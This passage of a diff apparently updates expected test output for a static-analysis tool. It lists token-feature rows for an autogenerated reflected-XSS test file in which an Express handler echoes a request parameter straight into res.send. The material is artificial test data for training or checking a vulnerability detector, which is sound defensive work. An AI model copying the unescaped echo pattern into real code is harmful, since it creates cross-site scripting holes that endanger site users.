OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | functio ... OT OK\\n} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | return of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:29:17:38:1 | return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:26:29:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:29:31:29:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:11 | { p } | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:11 | { p } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:11 | { p } | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:11 | { p } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:11 | { p } | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | { p } = req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | { p } = req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | { p } = req.params | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | { p } = req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:7:30:24 | { p } = req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:9:30:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:17 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:17 | req | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:17 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:24 | req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:24 | req.params | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:15:30:24 | req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:30:19:30:24 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:30:19:30:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:30:19:30:24 | params | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:30:19:30:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:30:19:30:24 | params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:9 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:9 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:9 | obj | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:9 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:9 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj = {} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj = {} | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj = {} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:32:7:32:14 | obj = {} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:32:13:32:14 | {} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:32:13:32:14 | {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:32:13:32:14 | {} | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:32:13:32:14 | {} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:32:13:32:14 | {} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:5 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:5 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:5 | obj | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:5 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:5 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:7 | obj.p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:7 | obj.p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:7 | obj.p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:7 | obj.p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:7 | obj.p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:11 | obj.p = p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:11 | obj.p = p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:11 | obj.p = p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:11 | obj.p = p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:33:3:33:11 | obj.p = p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:33:7:33:7 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:33:7:33:7 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:33:7:33:7 | p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:33:7:33:7 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:33:7:33:7 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:33:11:33:11 | p | assignedToPropName | p | +| autogenerated/Xss/ReflectedXss/tst2.js:33:11:33:11 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:33:11:33:11 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:33:11:33:11 | p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:33:11:33:11 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:33:11:33:11 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:11 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:11 | other | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:11 | other | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:11 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:11 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other = clone(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other = clone(obj) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other = clone(obj) | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other = clone(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:34:7:34:24 | other = clone(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:19 | clone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:19 | clone | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:19 | clone | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:19 | clone | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:19 | clone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | clone(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | clone(obj) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | clone(obj) | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | clone(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | clone(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | exceptional return of clone(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | exceptional return of clone(obj) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | exceptional return of clone(obj) | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | exceptional return of clone(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:34:15:34:24 | exceptional return of clone(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:34:21:34:23 | obj | CalleeFlexibleAccessPath | clone | | autogenerated/Xss/ReflectedXss/tst2.js:34:21:34:23 | obj | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:34:21:34:23 | obj | calleeImports | clone | @@ -21992,6 +146558,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:34:21:34:23 | obj | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | | autogenerated/Xss/ReflectedXss/tst2.js:34:21:34:23 | obj | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:34:21:34:23 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:5 | res | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:10 | res.send | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | exceptional return of res.send(p) | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | exceptional return of res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | exceptional return of res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | res.send(p) | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:36:3:36:13 | res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:36:7:36:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:36:7:36:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:36:7:36:10 | send | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:36:7:36:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:36:7:36:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:36:12:36:12 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:36:12:36:12 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:36:12:36:12 | p | contextFunctionInterfaces | | @@ -22000,6 +146591,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:36:12:36:12 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:36:12:36:12 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:36:12:36:12 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:5 | res | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:10 | res.send | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | exceptional return of res.send(other.p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | exceptional return of res.send(other.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | exceptional return of res.send(other.p) | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | exceptional return of res.send(other.p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | exceptional return of res.send(other.p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | res.send(other.p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | res.send(other.p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | res.send(other.p) | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | res.send(other.p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:37:3:37:19 | res.send(other.p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:37:7:37:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:37:7:37:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:37:7:37:10 | send | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:37:7:37:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:37:7:37:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:16 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:16 | other | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:16 | other | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:16 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:16 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:18 | other.p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:18 | other.p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:18 | other.p | contextFunctionInterfaces | | @@ -22008,12 +146629,51 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:18 | other.p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:18 | other.p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:37:12:37:18 | other.p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:37:18:37:18 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:37:18:37:18 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:37:18:37:18 | p | enclosingFunctionBody | req res p req params obj obj p p other clone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:37:18:37:18 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:37:18:37:18 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:25 | serializeJavaScript | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:25 | serializeJavaScript | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:25 | serializeJavaScript | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:25 | serializeJavaScript | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:59 | seriali ... cript') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:59 | seriali ... cript') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:59 | seriali ... cript') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:59 | serializeJavaScript | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:59 | serializeJavaScript | contextSurroundingFunctionParameters | | +| 